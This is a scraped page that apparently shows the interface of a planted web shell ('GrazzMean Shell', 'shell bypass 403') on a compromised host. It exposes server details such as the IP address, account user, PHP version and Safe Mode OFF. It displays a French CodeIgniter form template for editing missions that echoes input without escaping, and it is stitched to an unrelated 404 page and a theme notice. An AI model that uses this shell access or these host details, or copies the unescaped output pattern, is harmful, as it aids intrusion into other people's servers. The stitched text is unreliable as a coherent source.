shell bypass 403

GrazzMean Shell

Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : edit.php
<div class="row">
    <div class="col-md-12">
      	<div class="box box-info">
            <div class="box-header with-border">
              	<h3 class="box-title">Editer mission</h3>
            </div>
			<?php echo form_open('mission/edit/'.$mission['id']); ?>
			<div class="box-body">
				<div class="row clearfix">
					
					<div class="col-md-6">
						<label for="datedebut" class="control-label"><span class="text-danger">*</span>Datedebut</label>
						<div class="form-group">
							<input type="text" name="datedebut" value="<?php echo ($this->input->post('datedebut') ? $this->input->post('datedebut') : date("Y-m-d H:i",strtotime($mission['datedebut']))); ?>" class="has-datetimepicker form-control" id="datedebut" />
							<span class="text-danger"><?php echo form_error('datedebut');?></span>
						</div>
					</div>
					<div class="col-md-6">
						<label for="datefin" class="control-label"><span class="text-danger">*</span>Datefin</label>
						<div class="form-group">
							<input type="text" name="datefin" value="<?php echo ($this->input->post('datefin') ? $this->input->post('datefin') :  date("Y-m-d H:i",strtotime($mission['datefin']))); ?>" class="has-datetimepicker form-control" id="datefin" />
							<span class="text-danger"><?php echo form_error('datefin');?></span>
						</div>
					</div>
					<div class="col-md-6">
						<label for="destination" class="control-label"><span class="text-danger">*</span>Destination</label>
						<div class="form-group">
							<input type="text" name="destination" value="<?php echo ($this->input->post('destination') ? $this->input->post('destination') : $mission['destination']); ?>" class="form-control" id="destination" />
							<span class="text-danger"><?php echo form_error('destination');?></span>
						</div>
					</div>
					<div class="col-md-6">
						<label for="interim_id" class="control-label">Interim</label>
						<div class="form-group">
							<select name="interim_id" class="form-control">
								<option value="">select user</option>
								<?php 
								foreach($all_users as $user)
								{
									$selected = ($user['id'] == $mission['interim_id']) ? ' selected="selected"' : "";

									echo '<option value="'.$user['id'].'" '.$selected.'>'.$user['nom']." ".$user['prenom'].'</option>';
								} 
								?>
							</select>
						</div>
					</div>
					<div class="col-md-6">
						<label for="typemission_id" class="control-label">Type mission</label>
						<div class="form-group">
							<select name="typemission_id" class="form-control">
								<option value="">select typemission</option>
								<?php 
								foreach($all_typemission as $typemission)
								{
									$selected = ($typemission['id'] == $mission['typemission_id']) ? ' selected="selected"' : "";

									echo '<option value="'.$typemission['id'].'" '.$selected.'>'.$typemission['libelle'].'</option>';
								} 
								?>
							</select>
						</div>
					</div>
					<div class="col-md-6">
						<label for="transport_id" class="control-label">Moyen de Transport</label>
						<div class="form-group">
							<select name="transport_id" class="form-control">
								<option value="">select transport</option>
								<?php 
								foreach($all_transport as $transport)
								{
									$selected = ($transport['id'] == $mission['transport_id']) ? ' selected="selected"' : "";

									echo '<option value="'.$transport['id'].'" '.$selected.'>'.$transport['libelle'].'</option>';
								} 
								?>
							</select>
						</div>
					</div>
					<div class="col-md-6">
						<label for="objetmission_id" class="control-label">Objet mission</label>
						<div class="form-group">
							<select name="objetmission_id" class="form-control">
								<option value="">select objetmission</option>
								<?php 
								foreach($all_objetmission as $objetmission)
								{
									$selected = ($objetmission['id'] == $mission['objetmission_id']) ? ' selected="selected"' : "";

									echo '<option value="'.$objetmission['id'].'" '.$selected.'>'.$objetmission['libelle'].'</option>';
								} 
								?>
							</select>
						</div>
					</div>
					<div class="col-md-6">
						<label for="description" class="control-label">Description</label>
						<div class="form-group">
							<textarea name="description" class="form-control" id="description"><?php echo ($this->input->post('description') ? $this->input->post('description') : $mission['description']); ?></textarea>
						</div>
					</div>
				</div>
			</div>
			<div class="box-footer">
            	<button type="submit" class="btn btn-success">
					<i class="fa fa-check"></i> Enregistrer
				</button>
	        </div>				
			<?php echo form_close(); ?>
		</div>
    </div>
</div>
© 2026 GrazzMean
Page non trouvée – APK Comptoir Hammami
Jannah Theme License is not validated, Go to the theme options page to validate the license, You need a single license for each domain name.

404 :(

Oups ! Cette page est introuvable.

Il semble que nous ne puissions pas trouver ce que vous cherchez. Peut-être qu'une recherche pourrait vous aider.

Bouton retour en haut de la page